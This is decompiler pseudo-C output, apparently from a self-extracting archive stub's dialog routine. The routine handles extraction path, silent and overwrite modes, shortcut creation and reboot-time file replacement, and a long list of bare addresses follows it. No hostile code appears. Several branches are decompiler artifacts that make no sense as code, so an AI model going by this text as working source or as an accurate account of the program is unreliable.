    					__eax = SetDlgItemTextW( *(__ebp + 8), 0x66, 0x8785fa);
    					__eflags =  *(__ebp - 0x5c84);
    					if( *(__ebp - 0x5c84) == 0) {
    						while(1) {
    							L164:
    							_push(0x1000);
    							_t197 = _t285 - 0xe; // 0xffffa36e
    							_t198 = _t285 - 0xd; // 0xffffa36f
    							_t199 = _t285 - 0x5c84; // 0xffff46f8
    							_t200 = _t285 - 0xfc8c; // 0xfffea6f0
    							_push( *((intOrPtr*)(_t285 + 0xc)));
    							_t209 = E0084A1C9();
    							_t263 =  *((intOrPtr*)(_t285 + 0x10));
    							 *((intOrPtr*)(_t285 + 0xc)) = _t209;
    							if(_t209 != 0) {
    								_t210 = _t285 - 0x5c84;
    								_t279 = _t285 - 0x1bc8c;
    								_t277 = 6;
    								goto L2;
    							} else {
    								break;
    							}
    							L4:
    							while(E00841438(_t285 - 0xfc8c,  *((intOrPtr*)(0x86d618 + _t280 * 4))) != 0) {
    								_t280 =  &(_t280[0]);
    								if(_t280 < 0xe) {
    									continue;
    								} else {
    									goto L164;
    								}
    							}
    							__eflags = _t280 - 0xd;
    							if(__eflags > 0) {
    								continue;
    							}
    							L8:
    							switch( *((intOrPtr*)(_t280 * 4 +  &M0084C132))) {
    								case 0:
    									L9:
    									__eflags = _t263 - 2;
    									if(_t263 != 2) {
    										goto L164;
    									}
    									L10:
    									_t282 = 0x800;
    									E0084966B(_t285 - 0x7c84, 0x800);
    									E0083A22C(E0083B6C2(_t285 - 0x7c84, _t285 - 0x5c84, _t285 - 0xdc8c, 0x800), _t263, _t285 - 0x8c8c, 0x800);
    									 *(_t285 - 4) = _t277;
    									E0083A366(_t285 - 0x8c8c, _t285 - 0xdc8c);
    									E00836FEC(_t285 - 0x3c84);
    									_push(_t277);
    									_t271 = _t285 - 0x8c8c;
    									_t224 = E0083A2B9(_t285 - 0x8c8c, _t276, _t285 - 0x3c84);
    									__eflags = _t224;
    									if(_t224 == 0) {
    										L26:
    										 *(_t285 - 4) =  *(_t285 - 4) | 0xffffffff;
    										E0083A242(_t285 - 0x8c8c);
    										goto L164;
    									} else {
    										goto L13;
    										L14:
    										E0083B254(_t271, __eflags, _t285 - 0x7c84, _t285 - 0x103c, _t282);
    										E0083AF49(__eflags, _t285 - 0x103c, _t282);
    										_t284 = E00852B93(_t285 - 0x7c84);
    										__eflags = _t284 - 4;
    										if(_t284 < 4) {
    											L16:
    											_t252 = E0083B682(_t285 - 0x5c84);
    											__eflags = _t252;
    											if(_t252 != 0) {
    												goto L26;
    											}
    											L17:
    											_t254 = E00852B93(_t285 - 0x3c84);
    											__eflags = 0;
    											 *((short*)(_t285 + _t254 * 2 - 0x3c82)) = 0;
    											E0084E920(_t277, _t285 - 0x3c, _t277, 0x1e);
    											_t287 = _t287 + 0x10;
    											 *((intOrPtr*)(_t285 - 0x38)) = 3;
    											_push(0x14);
    											_pop(_t257);
    											 *((short*)(_t285 - 0x2c)) = _t257;
    											 *((intOrPtr*)(_t285 - 0x34)) = _t285 - 0x3c84;
    											_push(_t285 - 0x3c);
    											 *0x86def4();
    											goto L18;
    										}
    										L15:
    										_t262 = E00852B93(_t285 - 0x103c);
    										__eflags = _t284 - _t262;
    										if(_t284 > _t262) {
    											goto L17;
    										}
    										goto L16;
    										L18:
    										_t229 = GetFileAttributesW(_t285 - 0x3c84);
    										__eflags = _t229 - 0xffffffff;
    										if(_t229 == 0xffffffff) {
    											L25:
    											_push(_t277);
    											_t271 = _t285 - 0x8c8c;
    											_t231 = E0083A2B9(_t285 - 0x8c8c, _t276, _t285 - 0x3c84);
    											__eflags = _t231;
    											if(_t231 != 0) {
    												_t282 = 0x800;
    												L13:
    												SetFileAttributesW(_t285 - 0x3c84, _t277);
    												__eflags =  *((char*)(_t285 - 0x2c78));
    												if(__eflags == 0) {
    													goto L18;
    												}
    												goto L14;
    											}
    											goto L26;
    										}
    										L19:
    										_t233 = DeleteFileW(_t285 - 0x3c84);
    										__eflags = _t233;
    										if(_t233 != 0) {
    											goto L25;
    										} else {
    											_t283 = _t277;
    											_push(_t277);
    											goto L22;
    											L22:
    											E00833F53(_t285 - 0x103c, 0x800, L"%s.%d.tmp", _t285 - 0x3c84);
    											_t287 = _t287 + 0x14;
    											_t238 = GetFileAttributesW(_t285 - 0x103c);
    											__eflags = _t238 - 0xffffffff;
    											if(_t238 != 0xffffffff) {
    												_t283 = _t283 + 1;
    												__eflags = _t283;
    												_push(_t283);
    												goto L22;
    											} else {
    												_t241 = MoveFileW(_t285 - 0x3c84, _t285 - 0x103c);
    												__eflags = _t241;
    												if(_t241 != 0) {
    													MoveFileExW(_t285 - 0x103c, _t277, 4);
    												}
    												goto L25;
    											}
    										}
    									}
    								case 1:
    									L27:
    									__eflags = __ebx;
    									if(__ebx == 0) {
    										__eax =  *0x88ce0c;
    										__eflags =  *0x88ce0c;
    										__ebx = __ebx & 0xffffff00 |  *0x88ce0c == 0x00000000;
    										__eflags = __bl;
    										if(__bl == 0) {
    											__eax =  *0x88ce0c;
    											_pop(__ecx);
    											_pop(__ecx);
    										}
    										L30:
    										__bh =  *((intOrPtr*)(__ebp - 0xd));
    										__eflags = __bh;
    										if(__eflags == 0) {
    											__eax = __ebp + 0xc;
    											_push(__ebp + 0xc);
    											__esi = E0084A321(__ecx, __edx, __eflags);
    											__eax =  *0x88ce0c;
    										} else {
    											__esi = __ebp - 0x5c84;
    										}
    										__eflags = __bl;
    										if(__bl == 0) {
    											__edi = __eax;
    										}
    										L35:
    										__eax = E00852B93(__esi);
    										__eax = __eax + __edi;
    										_push(__eax);
    										_push( *0x88ce0c);
    										__eax = E00852BBE(__ecx, __edx);
    										__esp = __esp + 0xc;
    										__eflags = __eax;
    										if(__eax != 0) {
    											 *0x88ce0c = __eax;
    											__eflags = __bl;
    											if(__bl != 0) {
    												__ecx = 0;
    												__eflags = 0;
    												 *__eax = __cx;
    											}
    											__eax = E00856763(__eax, __esi);
    											_pop(__ecx);
    											_pop(__ecx);
    										}
    										__eflags = __bh;
    										if(__bh == 0) {
    											__eax = L00852BAE(__esi);
    										}
    									}
    									goto L164;
    								case 2:
    									L41:
    									__eflags = __ebx;
    									if(__ebx == 0) {
    										__ebp - 0x5c84 = SetWindowTextW( *(__ebp + 8), __ebp - 0x5c84);
    									}
    									goto L164;
    								case 3:
    									L43:
    									__eflags = __ebx;
    									if(__ebx != 0) {
    										goto L164;
    									}
    									L44:
    									__eflags =  *0x879602 - __di;
    									if( *0x879602 != __di) {
    										goto L164;
    									}
    									L45:
    									__eax = 0;
    									__edi = __ebp - 0x5c84;
    									_push(0x22);
    									 *(__ebp - 0x103c) = __ax;
    									_pop(__eax);
    									__eflags =  *(__ebp - 0x5c84) - __ax;
    									if( *(__ebp - 0x5c84) == __ax) {
    										__edi = __ebp - 0x5c82;
    									}
    									__eax = E00852B93(__edi);
    									__esi = 0x800;
    									__eflags = __eax - 0x800;
    									if(__eax >= 0x800) {
    										goto L164;
    									} else {
    										L48:
    										__eax =  *__edi & 0x0000ffff;
    										_push(0x5c);
    										_pop(__ecx);
    										__eflags = ( *__edi & 0x0000ffff) - 0x2e;
    										if(( *__edi & 0x0000ffff) != 0x2e) {
    											L52:
    											__eflags = __ax - __cx;
    											if(__ax == __cx) {
    												L64:
    												__ebp - 0x103c = E0083FAE7(__ebp - 0x103c, __edi, __esi);
    												__ebx = 0;
    												__eflags = 0;
    												L65:
    												_push(0x22);
    												_pop(__eax);
    												__eax = __ebp - 0x103c;
    												__eax = E00850D9B(__ebp - 0x103c, __ebp - 0x103c);
    												_pop(__ecx);
    												_pop(__ecx);
    												__eflags = __eax;
    												if(__eax != 0) {
    													__eflags =  *((intOrPtr*)(__eax + 2)) - __bx;
    													if( *((intOrPtr*)(__eax + 2)) == __bx) {
    														__ecx = 0;
    														__eflags = 0;
    														 *__eax = __cx;
    													}
    												}
    												__eax = __ebp - 0x103c;
    												__edi = 0x879602;
    												E0083FAE7(0x879602, __ebp - 0x103c, __esi) = __ebp - 0x103c;
    												__eax = E0084A06F(__ebp - 0x103c, __esi);
    												__esi = GetDlgItem( *(__ebp + 8), 0x66);
    												__ebp - 0x103c = SetWindowTextW(__esi, __ebp - 0x103c); // executed
    												__ebx =  *0x86df7c;
    												__eax = SendMessageW(__esi, 0x143, __ebx, 0x879602); // executed
    												__eax = __ebp - 0x103c;
    												__eax = E00852BC9(__ebp - 0x103c, 0x879602, __eax);
    												_pop(__ecx);
    												_pop(__ecx);
    												__eflags = __eax;
    												if(__eax != 0) {
    													__ebp - 0x103c = 0;
    													__eax = SendMessageW(__esi, 0x143, 0, __ebp - 0x103c);
    												}
    												goto L164;
    											}
    											L53:
    											__eflags = __ax;
    											if(__ax == 0) {
    												L55:
    												__eax = __ebp - 0x18;
    												__ebx = 0;
    												_push(__ebp - 0x18);
    												_push(1);
    												_push(0);
    												_push(L"Software\\Microsoft\\Windows\\CurrentVersion");
    												_push(0x80000002);
    												__eax =  *0x86dea8();
    												__eflags = __eax;
    												if(__eax == 0) {
    													__eax = __ebp - 0x14;
    													 *(__ebp - 0x14) = 0x1000;
    													_push(__ebp - 0x14);
    													__eax = __ebp - 0x103c;
    													_push(__ebp - 0x103c);
    													__eax = __ebp - 0x1c;
    													_push(__ebp - 0x1c);
    													_push(0);
    													_push(L"ProgramFilesDir");
    													_push( *(__ebp - 0x18));
    													__eax =  *0x86dea4();
    													_push( *(__ebp - 0x18));
    													 *0x86de84() =  *(__ebp - 0x14);
    													__ecx = 0x7ff;
    													__eax =  *(__ebp - 0x14) >> 1;
    													__eflags = __eax - 0x7ff;
    													if(__eax >= 0x7ff) {
    														__eax = 0x7ff;
    													}
    													__ecx = 0;
    													__eflags = 0;
    													 *((short*)(__ebp + __eax * 2 - 0x103c)) = __cx;
    												}
    												__eflags =  *(__ebp - 0x103c) - __bx;
    												if( *(__ebp - 0x103c) != __bx) {
    													__eax = __ebp - 0x103c;
    													__eax = E00852B93(__ebp - 0x103c);
    													_push(0x5c);
    													_pop(__ecx);
    													__eflags =  *((intOrPtr*)(__ebp + __eax * 2 - 0x103e)) - __cx;
    													if(__eflags != 0) {
    														__ebp - 0x103c = E0083FABF(__eflags, __ebp - 0x103c, 0x86258c, __esi);
    													}
    												}
    												__esi = E00852B93(__edi);
    												__eax = __ebp - 0x103c;
    												__eflags = __esi - 0x7ff;
    												__esi = 0x800;
    												if(__eflags < 0) {
    													__ebp - 0x103c = E0083FABF(__eflags, __ebp - 0x103c, __edi, 0x800);
    												}
    												goto L65;
    											}
    											L54:
    											__eflags =  *((short*)(__edi + 2)) - 0x3a;
    											if( *((short*)(__edi + 2)) == 0x3a) {
    												goto L64;
    											}
    											goto L55;
    										}
    										L49:
    										__eflags =  *((intOrPtr*)(__edi + 2)) - __cx;
    										if( *((intOrPtr*)(__edi + 2)) != __cx) {
    											goto L52;
    										}
    										L50:
    										__edi = __edi + 4;
    										__ebx = 0;
    										__eflags =  *__edi - __bx;
    										if( *__edi == __bx) {
    											goto L164;
    										}
    										L51:
    										__ebp - 0x103c = E0083FAE7(__ebp - 0x103c, __edi, 0x800);
    										goto L65;
    									}
    								case 4:
    									L70:
    									__eflags =  *0x8795fc - 1;
    									__eflags = __eax - 0x8795fc;
    									 *__edi =  *__edi + __ecx;
    									__eflags =  *(__ebx + 6) & __bl;
    									 *__eax =  *__eax + __al;
    									__eflags =  *__eax;
    								case 5:
    									L75:
    									__eax =  *(__ebp - 0x5c84) & 0x0000ffff;
    									__ecx = 0;
    									__eax =  *(__ebp - 0x5c84) & 0x0000ffff;
    									__eflags = __eax;
    									if(__eax == 0) {
    										L82:
    										 *0x8775cf = __cl;
    										 *0x8775f0 = 1;
    										goto L164;
    									}
    									L76:
    									__eax = __eax - 0x30;
    									__eflags = __eax;
    									if(__eax == 0) {
    										L80:
    										 *0x8775cf = __cl;
    										L81:
    										 *0x8775f0 = __cl;
    										goto L164;
    									}
    									L77:
    									__eax = __eax - 1;
    									__eflags = __eax;
    									if(__eax == 0) {
    										goto L82;
    									}
    									L78:
    									__eax = __eax - 1;
    									__eflags = __eax;
    									if(__eax != 0) {
    										goto L164;
    									}
    									L79:
    									 *0x8775cf = 1;
    									goto L81;
    								case 6:
    									L88:
    									__eflags = __ebx - 4;
    									if(__ebx != 4) {
    										goto L92;
    									}
    									L89:
    									__eax = __ebp - 0x5c84;
    									__eax = E00852BC9(__ebp - 0x5c84, __eax, L"<>");
    									_pop(__ecx);
    									_pop(__ecx);
    									__eflags = __eax;
    									if(__eax == 0) {
    										goto L92;
    									}
    									L90:
    									_push(__edi);
    									goto L91;
    								case 7:
    									goto L0;
    								case 8:
    									L116:
    									__eflags = __ebx - 3;
    									if(__ebx == 3) {
    										__eflags =  *(__ebp - 0x5c84) - __di;
    										if(__eflags != 0) {
    											__eax = __ebp - 0x5c84;
    											_push(__ebp - 0x5c84);
    											__eax = E00856702(__ebx, __edi);
    											_pop(__ecx);
    											 *0x88de1c = __eax;
    										}
    										__eax = __ebp + 0xc;
    										_push(__ebp + 0xc);
    										 *0x88de18 = E0084A321(__ecx, __edx, __eflags);
    									}
    									 *0x885d03 = 1;
    									goto L164;
    								case 9:
    									L121:
    									__eflags = __ebx - 5;
    									if(__ebx != 5) {
    										L92:
    										 *0x88de20 = 1;
    										goto L164;
    									}
    									L122:
    									_push(1);
    									L91:
    									__eax = __ebp - 0x5c84;
    									_push(__ebp - 0x5c84);
    									_push( *(__ebp + 8));
    									__eax = E0084C487();
    									goto L92;
    								case 0xa:
    									L123:
    									__eflags = __ebx - 6;
    									if(__ebx != 6) {
    										goto L164;
    									}
    									L124:
    									__eax = 0;
    									 *(__ebp - 0x2c3c) = __ax;
    									__eax =  *(__ebp - 0x1bc8c) & 0x0000ffff;
    									__eax = E00855A00( *(__ebp - 0x1bc8c) & 0x0000ffff);
    									_push(0x800);
    									__eflags = __eax - 0x50;
    									if(__eax == 0x50) {
    										_push(0x88ad0a);
    										__eax = __ebp - 0x2c3c;
    										_push(__ebp - 0x2c3c);
    										__eax = E0083FAE7();
    										 *(__ebp - 0x14) = 2;
    									} else {
    										__eflags = __eax - 0x54;
    										__eax = __ebp - 0x2c3c;
    										if(__eflags == 0) {
    											_push(0x889d0a);
    											_push(__eax);
    											__eax = E0083FAE7();
    											 *(__ebp - 0x14) = 7;
    										} else {
    											_push(0x88bd0a);
    											_push(__eax);
    											__eax = E0083FAE7();
    											 *(__ebp - 0x14) = 0x10;
    										}
    									}
    									__eax = 0;
    									 *(__ebp - 0x9c8c) = __ax;
    									 *(__ebp - 0x1c3c) = __ax;
    									__ebp - 0x19c8c = __ebp - 0x6c84;
    									__eax = E00854DC3(__ebp - 0x6c84, __ebp - 0x19c8c);
    									_pop(__ecx);
    									_pop(__ecx);
    									_push(0x22);
    									_pop(__ebx);
    									__eflags =  *(__ebp - 0x6c84) - __bx;
    									if( *(__ebp - 0x6c84) != __bx) {
    										L132:
    										__ebp - 0x6c84 = E00839F0F(__ebp - 0x6c84);
    										__eflags = __al;
    										if(__al != 0) {
    											goto L149;
    										}
    										L133:
    										__ebx = __edi;
    										__esi = __ebp - 0x6c84;
    										__eflags =  *(__ebp - 0x6c84) - __bx;
    										if( *(__ebp - 0x6c84) == __bx) {
    											goto L149;
    										}
    										L134:
    										_push(0x20);
    										_pop(__ecx);
    										do {
    											L135:
    											__eax = __esi->i & 0x0000ffff;
    											__eflags = __ax - __cx;
    											if(__ax == __cx) {
    												L137:
    												__edi = __eax;
    												__eax = 0;
    												__esi->i = __ax;
    												__ebp - 0x6c84 = E00839F0F(__ebp - 0x6c84);
    												__eflags = __al;
    												if(__al == 0) {
    													L144:
    													__esi->i = __di;
    													L145:
    													_push(0x20);
    													_pop(__ecx);
    													__edi = 0;
    													__eflags = 0;
    													goto L146;
    												}
    												L138:
    												_push(0x2f);
    												_pop(__eax);
    												__ebx = __esi;
    												__eflags = __di - __ax;
    												if(__di != __ax) {
    													L140:
    													_push(0x20);
    													_pop(__eax);
    													do {
    														L141:
    														__esi =  &(__esi->i);
    														__eflags = __esi->i - __ax;
    													} while (__esi->i == __ax);
    													_push(__esi);
    													__eax = __ebp - 0x1c3c;
    													L143:
    													_push(__eax);
    													__eax = E00854DC3();
    													_pop(__ecx);
    													_pop(__ecx);
    													 *__ebx = __di;
    													goto L145;
    												}
    												L139:
    												 *(__ebp - 0x1c3c) = __ax;
    												__eax =  &(__esi->i);
    												_push( &(__esi->i));
    												__eax = __ebp - 0x1c3a;
    												goto L143;
    											}
    											L136:
    											_push(0x2f);
    											_pop(__edx);
    											__eflags = __ax - __dx;
    											if(__ax != __dx) {
    												goto L146;
    											}
    											goto L137;
    											L146:
    											__esi =  &(__esi->i);
    											__eflags = __esi->i - __di;
    										} while (__esi->i != __di);
    										__eflags = __ebx;
    										if(__ebx != 0) {
    											__eax = 0;
    											__eflags = 0;
    											 *__ebx = __ax;
    										}
    										goto L149;
    									} else {
    										L130:
    										__ebp - 0x19c8a = __ebp - 0x6c84;
    										E00854DC3(__ebp - 0x6c84, __ebp - 0x19c8a) = __ebp - 0x6c82;
    										_push(__ebx);
    										_push(__ebp - 0x6c82);
    										__eax = E00850BB8(__ecx);
    										__esp = __esp + 0x10;
    										__eflags = __eax;
    										if(__eax != 0) {
    											__ecx = 0;
    											 *__eax = __cx;
    											__ebp - 0x1c3c = E00854DC3(__ebp - 0x1c3c, __ebp - 0x1c3c);
    											_pop(__ecx);
    											_pop(__ecx);
    										}
    										L149:
    										__eflags =  *(__ebp - 0x11c8c);
    										__ebx = 0x800;
    										if( *(__ebp - 0x11c8c) != 0) {
    											_push(0x800);
    											__eax = __ebp - 0x9c8c;
    											_push(__ebp - 0x9c8c);
    											__eax = __ebp - 0x11c8c;
    											_push(__ebp - 0x11c8c);
    											__eax = E0083AF74();
    										}
    										_push(__ebx);
    										__eax = __ebp - 0xbc8c;
    										_push(__ebp - 0xbc8c);
    										__eax = __ebp - 0x6c84;
    										_push(__ebp - 0x6c84);
    										__eax = E0083AF74();
    										__eflags =  *(__ebp - 0x2c3c);
    										if(__eflags == 0) {
    											__ebp - 0x2c3c = E0084A2C1(__ecx, __ebp - 0x2c3c,  *(__ebp - 0x14));
    										}
    										__ebp - 0x2c3c = E0083AF49(__eflags, __ebp - 0x2c3c, __ebx);
    										__eflags =  *((short*)(__ebp - 0x17c8c));
    										if(__eflags != 0) {
    											__ebp - 0x17c8c = __ebp - 0x2c3c;
    											E0083FABF(__eflags, __ebp - 0x2c3c, __ebp - 0x17c8c, __ebx) = __ebp - 0x2c3c;
    											__eax = E0083AF49(__eflags, __ebp - 0x2c3c, __ebx);
    										}
    										__ebp - 0x2c3c = __ebp - 0xcc8c;
    										__eax = E00854DC3(__ebp - 0xcc8c, __ebp - 0x2c3c);
    										__eflags =  *(__ebp - 0x13c8c);
    										__eax = __ebp - 0x13c8c;
    										_pop(__ecx);
    										_pop(__ecx);
    										if(__eflags == 0) {
    											__eax = __ebp - 0x19c8c;
    										}
    										__ebp - 0x2c3c = E0083FABF(__eflags, __ebp - 0x2c3c, __ebp - 0x2c3c, __ebx);
    										__eax = __ebp - 0x2c3c;
    										__eflags = E0083B1F0(__ebp - 0x2c3c);
    										if(__eflags == 0) {
    											L159:
    											__ebp - 0x2c3c = E0083FABF(__eflags, __ebp - 0x2c3c, L".lnk", __ebx);
    											goto L160;
    										} else {
    											L158:
    											__eflags = __eax;
    											if(__eflags == 0) {
    												L160:
    												_push(1);
    												__eax = __ebp - 0x2c3c;
    												_push(__ebp - 0x2c3c);
    												E00839DDE(__ecx, __ebp) = __ebp - 0xbc8c;
    												__ebp - 0xac8c = E00854DC3(__ebp - 0xac8c, __ebp - 0xbc8c);
    												_pop(__ecx);
    												_pop(__ecx);
    												__ebp - 0xac8c = E0083BA2A(__eflags, __ebp - 0xac8c);
    												__ecx =  *(__ebp - 0x1c3c) & 0x0000ffff;
    												__eax = __ebp - 0x1c3c;
    												__ecx =  ~( *(__ebp - 0x1c3c) & 0x0000ffff);
    												__edx = __ebp - 0x9c8c;
    												__esi = __ebp - 0xac8c;
    												asm("sbb ecx, ecx");
    												__ecx =  ~( *(__ebp - 0x1c3c) & 0x0000ffff) & __ebp - 0x00001c3c;
    												 *(__ebp - 0x9c8c) & 0x0000ffff =  ~( *(__ebp - 0x9c8c) & 0x0000ffff);
    												asm("sbb eax, eax");
    												__eax =  ~( *(__ebp - 0x9c8c) & 0x0000ffff) & __ebp - 0x00009c8c;
    												 *(__ebp - 0xac8c) & 0x0000ffff =  ~( *(__ebp - 0xac8c) & 0x0000ffff);
    												__eax = __ebp - 0x15c8c;
    												asm("sbb edx, edx");
    												__edx =  ~( *(__ebp - 0xac8c) & 0x0000ffff) & __esi;
    												E00849DB4(__ebp - 0x15c8c) = __ebp - 0x2c3c;
    												__ebp - 0xbc8c = E008494C3(__ecx, __edi, __ebp - 0xbc8c, __ebp - 0x2c3c,  ~( *(__ebp - 0xac8c) & 0x0000ffff) & __esi, __ebp - 0xbc8c,  ~( *(__ebp - 0x9c8c) & 0x0000ffff) & __ebp - 0x00009c8c,  ~( *(__ebp - 0x1c3c) & 0x0000ffff) & __ebp - 0x00001c3c);
    												__eflags =  *(__ebp - 0xcc8c);
    												if( *(__ebp - 0xcc8c) != 0) {
    													_push(__edi);
    													__eax = __ebp - 0xcc8c;
    													_push(__ebp - 0xcc8c);
    													_push(5);
    													_push(0x1000);
    													__eax =  *0x86def8();
    												}
    												goto L164;
    											}
    											goto L159;
    										}
    									}
    								case 0xb:
    									L162:
    									__eflags = __ebx - 7;
    									if(__ebx == 7) {
    										 *0x879600 = 1;
    									}
    									goto L164;
    								case 0xc:
    									L83:
    									__eax =  *(__ebp - 0x5c84) & 0x0000ffff;
    									__eax = E00855A00( *(__ebp - 0x5c84) & 0x0000ffff);
    									__eflags = __eax - 0x46;
    									if(__eax == 0x46) {
    										 *0x8775f1 = 1;
    									} else {
    										__eflags = __eax - 0x55;
    										if(__eax == 0x55) {
    											 *0x8775f2 = 1;
    										} else {
    											__eax = 0;
    											 *0x8775f1 = __al;
    											 *0x8775f2 = __al;
    										}
    									}
    									goto L164;
    								case 0xd:
    									L93:
    									 *0x88de21 = 1;
    									__eax = __eax + 0x88de21;
    									_t104 = __esi + 0x39;
    									 *_t104 =  *(__esi + 0x39) + __esp;
    									__eflags =  *_t104;
    									__ebp = 0xffffa37c;
    									if( *_t104 != 0) {
    										_t106 = __ebp - 0x5c84; // 0xffff46f8
    										__eax = _t106;
    										_push(_t106);
    										 *0x86d5fc = E00841424();
    									}
    									goto L164;
    							}
    							L2:
    							_t210 = E00849E97(_t210, _t279);
    							_t279 = _t279 + 0x2000;
    							_t277 = _t277 - 1;
    							if(_t277 != 0) {
    								goto L2;
    							} else {
    								_t280 = _t277;
    								goto L4;
    							}
    						}
    						L165:
    						 *[fs:0x0] =  *((intOrPtr*)(_t285 - 0xc));
    						return _t209;
    					}
    					L100:
    					__eflags =  *0x885d02;
    					if( *0x885d02 != 0) {
    						goto L164;
    					}
    					L101:
    					__eax = 0;
    					 *(__ebp - 0x143c) = __ax;
    					__eax = __ebp - 0x5c84;
    					_push(__ebp - 0x5c84);
    					__eax = E00850BB8(__ecx);
    					_pop(__ecx);
    					__ecx = 0x2c;
    					__eflags = __eax;
    					if(__eax != 0) {
    						L108:
    						__eflags =  *(__ebp - 0x143c);
    						if( *(__ebp - 0x143c) == 0) {
    							__ebp - 0x1bc8c = __ebp - 0x5c84;
    							E0083FAE7(__ebp - 0x5c84, __ebp - 0x1bc8c, 0x1000) = __ebp - 0x19c8c;
    							__ebp - 0x143c = E0083FAE7(__ebp - 0x143c, __ebp - 0x19c8c, 0x200);
    						}
    						__ebp - 0x5c84 = E00849CC2(__ebp - 0x5c84);
    						__eax = 0;
    						 *(__ebp - 0x4c84) = __ax;
    						__ebp - 0x143c = __ebp - 0x5c84;
    						__eax = E008497A8( *(__ebp + 8), __ebp - 0x5c84, __ebp - 0x143c, 0x24);
    						__eflags = __eax - 6;
    						if(__eax == 6) {
    							goto L164;
    						} else {
    							L111:
    							__eax = 0;
    							__eflags = 0;
    							 *0x8775cc = 1;
    							 *0x8785fa = __ax;
    							__eax = EndDialog( *(__ebp + 8), 1);
    							goto L112;
    						}
    					}
    					L102:
    					__esi = 0;
    					__eflags =  *(__ebp - 0x5c84) - __dx;
    					if( *(__ebp - 0x5c84) == __dx) {
    						goto L108;
    					}
    					L103:
    					__ecx = 0;
    					__eax = __ebp - 0x5c84;
    					while(1) {
    						L104:
    						__eflags =  *__eax - 0x40;
    						if( *__eax == 0x40) {
    							break;
    						}
    						L105:
    						__esi =  &(__esi->i);
    						__eax = __ebp - 0x5c84;
    						__ecx = __esi + __esi;
    						__eax = __ebp - 0x5c84 + __ecx;
    						__eflags =  *__eax - __dx;
    						if( *__eax != __dx) {
    							continue;
    						}
    						L106:
    						goto L108;
    					}
    					L107:
    					__ebp - 0x5c82 = __ebp - 0x5c82 + __ecx;
    					__ebp - 0x143c = E0083FAE7(__ebp - 0x143c, __ebp - 0x5c82 + __ecx, 0x200);
    					__eax = 0;
    					__eflags = 0;
    					 *(__ebp + __esi * 2 - 0x5c84) = __ax;
    					goto L108;
    					L112:
    					__eflags = _t263 - 7;
    					if(_t263 == 7) {
    						__eflags =  *0x8795fc;
    						if( *0x8795fc == 0) {
    							 *0x8795fc = 2;
    						}
    						 *0x8785f8 = 1;
    					}
    					goto L164;
    				}
    			}










    0x0084bbb6
    0x0084bbb6
    0x0084bbb6
    0x0084bbb6
    0x0084bbb9
    0x00000000
    0x00000000
    0x0084bbbf
    0x0084bbbf
    0x0084bbc5
    0x0084bbd3
    0x0084bbdf
    0x0084bbe1
    0x0084bbe3
    0x0084bbe8
    0x0084bbe8
    0x0084bbe8
    0x0084bc00
    0x0084bc0d
    0x0084bc12
    0x0084bc14
    0x00000000
    0x00000000
    0x0084bbe6
    0x0084bbe6
    0x0084bbe6
    0x0084bbe7
    0x0084bbe7
    0x0084bc16
    0x0084bc20
    0x0084bc26
    0x0084bc2e
    0x0084c0ee
    0x0084c0ee
    0x0084c0ee
    0x0084c0f3
    0x0084c0f7
    0x0084c0fb
    0x0084c102
    0x0084c109
    0x0084c10c
    0x0084c111
    0x0084c114
    0x0084c119
    0x0084b578
    0x0084b57e
    0x0084b584
    0x0084b584
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x0084b599
    0x0084b5b0
    0x0084b5b4
    0x00000000
    0x0084b5b6
    0x00000000
    0x0084b5b6
    0x0084b5b4
    0x0084b5bb
    0x0084b5be
    0x00000000
    0x00000000
    0x0084b5c4
    0x0084b5c4
    0x00000000
    0x0084b5cb
    0x0084b5cb
    0x0084b5ce
    0x00000000
    0x00000000
    0x0084b5d4
    0x0084b5d4
    0x0084b5e1
    0x0084b607
    0x0084b612
    0x0084b61c
    0x0084b627
    0x0084b62c
    0x0084b634
    0x0084b63a
    0x0084b63f
    0x0084b641
    0x0084b7a6
    0x0084b7a6
    0x0084b7b0
    0x00000000
    0x0084b647
    0x0084b64d
    0x0084b66f
    0x0084b67e
    0x0084b68b
    0x0084b69c
    0x0084b69f
    0x0084b6a2
    0x0084b6b5
    0x0084b6bc
    0x0084b6c1
    0x0084b6c3
    0x00000000
    0x00000000
    0x0084b6c9
    0x0084b6d0
    0x0084b6d5
    0x0084b6da
    0x0084b6e6
    0x0084b6eb
    0x0084b6ee
    0x0084b6f5
    0x0084b6f7
    0x0084b6f8
    0x0084b702
    0x0084b708
    0x0084b709
    0x00000000
    0x0084b709
    0x0084b6a4
    0x0084b6ab
    0x0084b6b1
    0x0084b6b3
    0x00000000
    0x00000000
    0x00000000
    0x0084b70f
    0x0084b716
    0x0084b718
    0x0084b71b
    0x0084b78b
    0x0084b78b
    0x0084b793
    0x0084b799
    0x0084b79e
    0x0084b7a0
    0x0084b64f
    0x0084b654
    0x0084b65c
    0x0084b662
    0x0084b669
    0x00000000
    0x00000000
    0x00000000
    0x0084b669
    0x00000000
    0x0084b7a0
    0x0084b71d
    0x0084b724
    0x0084b72a
    0x0084b72c
    0x00000000
    0x0084b72e
    0x0084b72e
    0x0084b730
    0x0084b731
    0x0084b735
    0x0084b74d
    0x0084b752
    0x0084b75c
    0x0084b75e
    0x0084b761
    0x0084b733
    0x0084b733
    0x0084b734
    0x00000000
    0x0084b763
    0x0084b771
    0x0084b777
    0x0084b779
    0x0084b785
    0x0084b785
    0x00000000
    0x0084b779
    0x0084b761
    0x0084b72c
    0x00000000
    0x0084b7ba
    0x0084b7ba
    0x0084b7bc
    0x0084b7c2
    0x0084b7c7
    0x0084b7c9
    0x0084b7cc
    0x0084b7ce
    0x0084b7db
    0x0084b7e0
    0x0084b7e1
    0x0084b7e1
    0x0084b7e2
    0x0084b7e2
    0x0084b7e5
    0x0084b7e7
    0x0084b7f1
    0x0084b7f4
    0x0084b7fa
    0x0084b7fc
    0x0084b7e9
    0x0084b7e9
    0x0084b7e9
    0x0084b801
    0x0084b803
    0x0084b80c
    0x0084b80c
    0x0084b80e
    0x0084b80f
    0x0084b814
    0x0084b81d
    0x0084b81e
    0x0084b824
    0x0084b829
    0x0084b82c
    0x0084b82e
    0x0084b830
    0x0084b835
    0x0084b837
    0x0084b839
    0x0084b839
    0x0084b83b
    0x0084b83b
    0x0084b840
    0x0084b845
    0x0084b846
    0x0084b846
    0x0084b847
    0x0084b849
    0x0084b850
    0x0084b855
    0x0084b849
    0x00000000
    0x00000000
    0x0084b85b
    0x0084b85b
    0x0084b85d
    0x0084b86d
    0x0084b86d
    0x00000000
    0x00000000
    0x0084b878
    0x0084b878
    0x0084b87a
    0x00000000
    0x00000000
    0x0084b880
    0x0084b880
    0x0084b887
    0x00000000
    0x00000000
    0x0084b88d
